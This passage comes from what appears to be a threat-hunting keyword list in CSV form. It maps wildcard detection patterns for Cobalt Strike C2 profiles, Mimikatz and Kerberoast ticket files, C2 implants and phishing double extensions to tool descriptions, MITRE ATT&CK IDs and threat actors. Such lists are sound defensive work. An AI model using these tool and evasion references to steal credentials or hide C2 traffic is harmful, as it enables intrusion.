- T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - 
T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*.forums.123456.*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - 
APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*.ftp.123456.*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*.get_c2profile*,offensive_tool_keyword,mythic,A collaborative multi-platform red teaming framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003,N/A,N/A,C2,https://github.com/its-a-feature/Mythic,1,1,N/A,10,10,2490,383,2023-10-03T23:06:16Z,2018-07-05T02:09:59Z -*.go.123456.*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the 
chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*.groups.123456.*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - 
TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*.help.123456.*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*.imap.123456.*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - 
T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*.img.123456.*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth 
Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*.interactsh.com,offensive_tool_keyword,interactsh,Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C7,T1566.002 - T1566.001 - T1071 - T1102,TA0011 - TA0001,N/A,N/A,C2,https://github.com/projectdiscovery/interactsh,1,0,FP risk - legitimate service abused by attackers - move to admintools ?,10,10,2675,317,2023-10-02T08:20:04Z,2021-01-29T14:31:51Z -*.kb.123456.*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*.kerberoast.txt*,offensive_tool_keyword,msldapdump,LDAP enumeration tool implemented in Python3,T1018 - T1210.001,TA0007 - TA0001,N/A,N/A,Reconnaissance,https://github.com/dievus/msLDAPDump,1,1,N/A,N/A,3,205,27,2023-08-14T13:15:29Z,2022-12-30T23:35:40Z -*.kirbi *,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,0,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*.ldapdump.txt*,offensive_tool_keyword,msldapdump,LDAP enumeration tool implemented in Python3,T1018 - T1210.001,TA0007 - TA0001,N/A,N/A,Reconnaissance,https://github.com/dievus/msLDAPDump,1,1,N/A,N/A,3,205,27,2023-08-14T13:15:29Z,2022-12-30T23:35:40Z -*.lists.123456.*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - 
T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*.live.123456.*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*.local.kirbi*,offensive_tool_keyword,kerberoast,Kerberoast is a series of tools for attacking MS Kerberos 
implementations,T1550 - T1555 - T1212 - T1558,TA0001 - TA0004 - TA0006,N/A,N/A,Credential Access,https://github.com/nidem/kerberoast,1,1,N/A,N/A,10,1282,313,2022-12-31T17:17:28Z,2014-09-22T14:46:49Z -*.m.123456.*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*.mail.123456.*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - 
T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*.media.123456.*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*.mobile.123456.*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*.mysql.123456.*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 
- T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*.news.123456.*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z 
-*.nimplant*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*.pdf.bat*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.pdf.dll*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.pdf.exe*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.pdf.htm*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.pdf.jar*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.pdf.js*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.pdf.sfx*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.pdf.vbs*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.photos.123456.*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - 
